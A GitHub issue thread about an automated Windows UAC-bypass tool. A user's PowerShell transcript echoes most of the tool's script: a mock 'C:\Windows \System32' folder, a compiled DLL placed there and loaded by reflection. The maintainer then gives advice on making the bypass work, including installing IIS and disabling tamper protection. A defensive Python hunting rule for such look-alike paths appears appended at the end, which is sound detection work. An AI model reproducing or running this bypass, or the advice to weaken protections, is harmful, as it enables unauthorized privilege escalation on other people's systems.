x0xr00t / Automated-MUlti-UAC-Bypass

Automated Multi UAC BYPASS for win10|win11|win12-pre-release|ws2019|ws2022

Doesn't work on Windows 10 Enterprise 22H2 Build 19045.4170 #31

Closed KoleckOLP closed 2 months ago

KoleckOLP commented 2 months ago

I get the script to run but it pops up UAC, so it doesn't get any elevated privileges. I don't understand what IIS libraries I am supposed to install; could you please clarify that?

I also briefly tried it on Server 2012, which is not listed as supported, and got the same issue: I just get UAC and not elevation.

KoleckOLP commented 2 months ago

POWERSHELL:

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\test> Set-ExecutionPolicy Bypass -Scope CurrentUser

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A
PS C:\Users\test> cd .\Documents\
PS C:\Users\test\Documents> cd ..
PS C:\Users\test> cd Dow
cd : Cannot find path 'C:\Users\test\Dow' because it does not exist.
At line:1 char:1
+ cd Dow
+ ~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\test\Dow:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand

PS C:\Users\test> cd .\Downloads\
PS C:\Users\test\Downloads> ls

    Directory: C:\Users\test\Downloads

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          7/1/2024   2:48 PM                Automated-MUlti-UAC-Bypass-1.5.9-beta
d-----          7/1/2024   3:22 PM                Automated-MUlti-UAC-Bypass-master
d-----          7/1/2024   2:18 PM                disable-windows-defender.github.io-master
d-----          7/1/2024   2:34 PM                HEVD.3.00
-a----          7/1/2024   2:41 PM           1999 51410.txt
-a----          7/1/2024   2:48 PM           9478 Automated-MUlti-UAC-Bypass-1.5.9-beta.zip
-a----          7/1/2024   2:50 PM          73316 Automated-MUlti-UAC-Bypass-master.zip
-a----          7/1/2024   2:18 PM          12987 disable-windows-defender.github.io-master.zip
-a----          7/1/2024   2:34 PM         480665 HEVD.3.00.zip
-a----          7/1/2024   2:58 PM       10694656 iisexpress_amd64_en-US.msi
-a----          7/1/2024   2:58 PM        4636672 iisexpress_x86_en-US.msi
-a----          7/1/2024   2:08 PM        2492669 Windows-OS-Funny-2.jpg.png

PS C:\Users\test\Downloads> cd .\Automated-MUlti-UAC-Bypass-master\
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> ls

    Directory: C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          7/1/2024   2:50 PM                .github
-a----          7/1/2024   2:50 PM         118784 cmstp.exe
-a----          7/1/2024   2:50 PM          17408 cmstp.exe.mui
-a----          7/1/2024   2:50 PM          36864 cmstplua.dll
-a----          7/1/2024   2:50 PM           2560 cmstplua.dll.mui
-a----          7/1/2024   2:50 PM           8044 file.ps1
-a----          7/1/2024   2:50 PM           4417 README.md
-a----          7/1/2024   3:22 PM           7168 sl0p.dll
-a----          7/1/2024   2:50 PM           4343 sl0puacb.cs

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> .\file.ps1

 000000000000000000000000000000000000000000
 0 Sl0ppyR00t Gonna Check the OS version. 0
 0      We do the UAC based on the OS     0
 0    So that you don't need to check it. 0
 0            Team Sl0ppyRoot             0
 0               ~x0xr00t~                0
 000000000000000000000000000000000000000000

 0000000000000000000000000000000000000000000
 0 Sl0ppyR00t says it's a Windows 10 Enterprise! 0
 0000000000000000000000000000000000000000000

 00000000000000000000000000000000000000
 0 Sl0ppyR00t Making Mock Folder..... 0
 00000000000000000000000000000000000000
New-Item : An item with the specified name \\?\C:\Windows\System32 already exists.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:96 char:1
+ New-Item "\\?\C:\Windows\System32" -ItemType Directory
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (\\?\C:\Windows\System32:String) [New-Item], IOException
    + FullyQualifiedErrorId : DirectoryExist,Microsoft.PowerShell.Commands.NewItemCommand

 {Sl0ppyr00t} Making Mock Folder of (C:\windows /system32) is done.

 00000000000000000000000000000000000000
 0 Sl0ppyR00t Making DLL Files ...... 0
 00000000000000000000000000000000000000
Add-Type : (0) : Error generating Win32 resource: Access is denied.
(1) : using System;
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:106 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : (0) : Warning as Error: Unable to delete temporary file
'c:\Windows\System32\CSC133C135CFF474EBF823EEBE2645C9841.TMP' used for default Win32 resource -- The system cannot
find the file specified.
(1) : using System;
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:106 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : Cannot add type. Compilation errors occurred.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:106 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Add-Type], InvalidOperationException
    + FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand

 {Sl0ppyr00t} Making DLL files is done.

 0000000000000000000000000000000000000
 0 Sl0ppyR00t Copy DLL Files to Mock 0
 0000000000000000000000000000000000000
Copy-Item : Access to the path 'C:\Windows\System32\sl0p.dll' is denied.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:115 char:1
+ Copy-Item "sl0p.dll" -Destination "C:\Windows\System32"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\test\D...master\sl0p.dll:FileInfo) [Copy-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

 {Sl0ppyr00t} Copy Dll to Mock Folder of system32 is done.

 0000000000000000000000000000000000000000
 0 Sl0ppyR00t Verify Place of DLL Files 0
 0000000000000000000000000000000000000000
Get-ChildItem : Cannot find path 'C:\Windows \System32\sl0p.dll' because it does not exist.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:124 char:1
+ Get-ChildItem "C:\Windows \System32\sl0p.dll"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Windows \System32\sl0p.dll:String) [Get-ChildItem], ItemNotFoundExce
   ption
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

 {Sl0ppyr00t} File Is there.

GAC    Version        Location
---    -------        --------
False  v4.0.30319
Start-Process : This command cannot be run due to the error: The operation was canceled by the user.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:133 char:1
+ Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile - ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

CMD:

Microsoft Windows [Version 10.0.19045.4170]
(c) Microsoft Corporation. All rights reserved.

C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>type file.ps1 | powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Author: P.Hoogeveem
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # The main .ps1 file been re-dev by dev: @keytrap-x86
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Aka: x0xr00t
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Build: 20210809
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Name: UAC Bypass Win Server 2019| Win Server 2022 | Win 10 | Win 11 | win 12 pre-release
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Impact: Privesc
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Method: DllReflection
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Usage: Run the .ps1 file.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Function to get the PowerShell location
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> function Get-PowerShellLocation {
>>     # Try to find PowerShell v7
>>     $pwshPath = "C:\Program Files\PowerShell\7\pwsh.exe"
>>     if (Test-Path $pwshPath) {
>>         return $pwshPath
>>     }
>>
>>     # Try to find PowerShell v2
>>     $psPath = Join-Path $env:SystemRoot "System32\WindowsPowerShell\v1.0\powershell.exe"
>>     if (Test-Path $psPath) {
>>         return $psPath
>>     }
>>
>>     # Try to find PowerShell v1
>>     $psv1Path = Join-Path $env:SystemRoot "System32\WindowsPowerShell\v1.0\powershell.exe"
>>     if (Test-Path $psv1Path) {
>>         return $psv1Path
>>     }
>>
>>     # PowerShell not found
>>     Write-Host "PowerShell location not found." -ForegroundColor Red
>>     exit
>> }
>>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Get the PowerShell location
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $PowerShellLocation = Get-PowerShellLocation
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 000000000000000000000000000000000000000000"
 000000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Gonna Check the OS version. 0"
 0 Sl0ppyR00t Gonna Check the OS version. 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0      We do the UAC based on the OS     0"
 0      We do the UAC based on the OS     0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0    So that you don't need to check it. 0"
 0    So that you don't need to check it. 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0            Team Sl0ppyRoot             0"
 0            Team Sl0ppyRoot             0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0               ~x0xr00t~                0"
 0               ~x0xr00t~                0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 000000000000000000000000000000000000000000"
 000000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $user = $(cmd.exe /c echo %username%)
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # OS-Check
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $OSVersion = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $supportedVersions = @(
>>     "Windows 10 Home",
>>     "Windows 10 Pro",
>>     "Windows 10 Education",
>>     "Windows 10 Enterprise",
>>     "Windows 10 Enterprise 2015",
>>     "Windows 10 Mobile and Mobile Enterprise",
>>     "Windows 10 IoT Core",
>>     "Windows 10 IoT Enterprise LTSC 2021",
>>     "Windows 10 IoT Mobile Enterprise",
>>     "Windows Server 2019 Standard",
>>     "Windows Server 2019 Datacenter",
>>     "Windows Server 2019 Essentials",
>>     "Windows Server 2019 Azure Core",
>>     "Windows Server 2022 Standard",
>>     "Windows Server 2022 Datacenter",
>>     "Windows Server 2022 Azure Core",
>>     "Windows 11 Home",
>>     "Windows 11 Pro",
>>     "Windows 11 Education",
>>     "Windows 11 Enterprise",
>>     "Windows 11 IoT Enterprise",
>>     "Windows 11 IoT Mobile Enterprise",
>>     "Windows 11 Team",
>>     "Windows 11 Enterprise Multi-session"
>> )
>>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> if ($supportedVersions -notcontains $OSVersion) {
>>     Write-Host "Unsupported OS version: $OSVersion"
>>     Write-Host "Exiting..."
>>     exit
>> } else {
>>     Write-Host " 0000000000000000000000000000000000000000000"
>>     Write-Host " 0 Sl0ppyR00t says it's a $OSVersion! 0"
>>     Write-Host " 0000000000000000000000000000000000000000000"
>>     Write-Host ""
>>     Write-Host ""
>> }
>>
 0000000000000000000000000000000000000000000
 0 Sl0ppyR00t says it's a Windows 10 Enterprise! 0
 0000000000000000000000000000000000000000000

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Making Mock Folder..... 0"
 0 Sl0ppyR00t Making Mock Folder..... 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> New-Item "\\?\C:\Windows\System32" -ItemType Directory
New-Item : An item with the specified name \\?\C:\Windows\System32 already exists.
At line:1 char:1
+ New-Item "\\?\C:\Windows\System32" -ItemType Directory
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (\\?\C:\Windows\System32:String) [New-Item], IOException
    + FullyQualifiedErrorId : DirectoryExist,Microsoft.PowerShell.Commands.NewItemCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} Making Mock Folder of (C:\windows /system32) is done."
 {Sl0ppyr00t} Making Mock Folder of (C:\windows /system32) is done.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Making DLL Files ...... 0"
 0 Sl0ppyR00t Making DLL Files ...... 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "sl0p.dll"
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows\System32\sl0p.dll"
Add-Type : (0) : Error generating Win32 resource: Access is denied.
(1) : using System;
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : (0) : Warning as Error: Unable to delete temporary file
'c:\Windows\System32\CSC4CDCE3D071504F5F8FDE2935A652E620.TMP' used for default Win32 resource -- The system cannot
find the file specified.
(1) : using System;
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : Cannot add type. Compilation errors occurred.
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Add-Type], InvalidOperationException
    + FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} Making DLL files is done."
 {Sl0ppyr00t} Making DLL files is done.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000"
 0000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Copy DLL Files to Mock 0"
 0 Sl0ppyR00t Copy DLL Files to Mock 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000"
 0000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Copy-Item "sl0p.dll" -Destination "C:\Windows\System32"
Copy-Item : Access to the path 'C:\Windows\System32\sl0p.dll' is denied.
At line:1 char:1
+ Copy-Item "sl0p.dll" -Destination "C:\Windows\System32"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\test\D...master\sl0p.dll:FileInfo) [Copy-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} Copy Dll to Mock Folder of system32 is done."
 {Sl0ppyr00t} Copy Dll to Mock Folder of system32 is done.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000000"
 0000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Verify Place of DLL Files 0"
 0 Sl0ppyR00t Verify Place of DLL Files 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000000"
 0000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Get-ChildItem "C:\Windows \System32\sl0p.dll"
Get-ChildItem : Cannot find path 'C:\Windows \System32\sl0p.dll' because it does not exist.
At line:1 char:1
+ Get-ChildItem "C:\Windows \System32\sl0p.dll"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Windows \System32\sl0p.dll:String) [Get-ChildItem], ItemNotFoundExce
   ption
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} File Is there."
 {Sl0ppyr00t} File Is there.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\sl0p.dll"))

GAC    Version        Location
---    -------        --------
False  v4.0.30319

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $testadmin = $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> if ($testadmin -eq $false) {
>> Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
>> exit $LASTEXITCODE
>> }
>> # Get the ID and security principal of the current user account
>>
Start-Process : This command cannot be run due to the error: The operation was canceled by the user.
At line:2 char:1
+ Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile - ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

x0xr00t commented 2 months ago

Let's start with Server 2012. It's not tested nor supported. This is due to the fact that Windows Server 2019 + Windows Server 2022 use cmstp. Likely not working on older Windows Server versions, although not tested.

Next Windows 10, to make sure it's working. Go to the section to install extra Windows components, install the IIS ([Install IIS (Internet Information Services)]); the cmstp will be installed into system32 after that. Make sure to also check to disable tamper, and also make sure the path for mock is "(C:\Windows\system32" been copied to "C:\Windows "
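For defenders reading this thread, the paths in the transcript (`C:\Windows \System32\sl0p.dll`, with a space after `Windows`) give a simple hunting rule: flag any file or image path that passes through a folder whose name matches a trusted Windows directory once trailing whitespace is removed. The following is an added example, not part of the issue or the repository; the event fields, the `TRUSTED_DIRS` list and the sample records are constructed for illustration.

```python
# Hunting rule for "mock trusted directory" paths such as "C:\Windows \System32".
# Event layout (id/type/path) is a hypothetical, simplified telemetry record.

# Directories a look-alike folder would imitate (assumed list; extend as needed).
TRUSTED_DIRS = {
    r"c:\windows",
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",
}


def _components(path):
    """Split a Windows path into components, dropping a leading \\\\?\\ prefix."""
    if path.startswith("\\\\?\\"):
        path = path[4:]
    return [c for c in path.split("\\") if c]


def mock_trusted_prefix(path):
    """Return the look-alike directory prefix, or None.

    A prefix is reported when at least one of its components carries trailing
    whitespace and the prefix equals a trusted directory after that whitespace
    is stripped. Trailing whitespace under unrelated folders is not reported.
    """
    parts = _components(path)
    for i in range(1, len(parts) + 1):
        raw = parts[:i]
        if all(c == c.rstrip() for c in raw):
            continue  # nothing padded in this prefix yet
        cleaned = "\\".join(c.rstrip() for c in raw).lower()
        if cleaned in TRUSTED_DIRS:
            return "\\".join(raw)
    return None


def scan(events):
    """Return (event id, look-alike prefix) for every suspicious event."""
    findings = []
    for ev in events:
        prefix = mock_trusted_prefix(ev["path"])
        if prefix is not None:
            findings.append((ev["id"], prefix))
    return findings


# Constructed sample events; paths 1-3 are taken from the transcript above.
SAMPLE_EVENTS = [
    {"id": 1, "type": "file_create", "path": r"\\?\C:\Windows \System32"},
    {"id": 2, "type": "file_create", "path": r"C:\Windows \System32\sl0p.dll"},
    {"id": 3, "type": "process_create", "path": r"C:\Windows\System32\cmstp.exe"},
    {"id": 4, "type": "file_create", "path": r"C:\Users\test\Downloads\My Folder \notes.txt"},
    {"id": 5, "type": "image_load", "path": r"C:\WINDOWS  \SysWOW64\example.dll"},
]

if __name__ == "__main__":
    for event_id, prefix in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: path goes through look-alike folder {prefix!r}")
```

The rule matches on the raw path string, so it only works on telemetry that records paths before any normalization trims the trailing space.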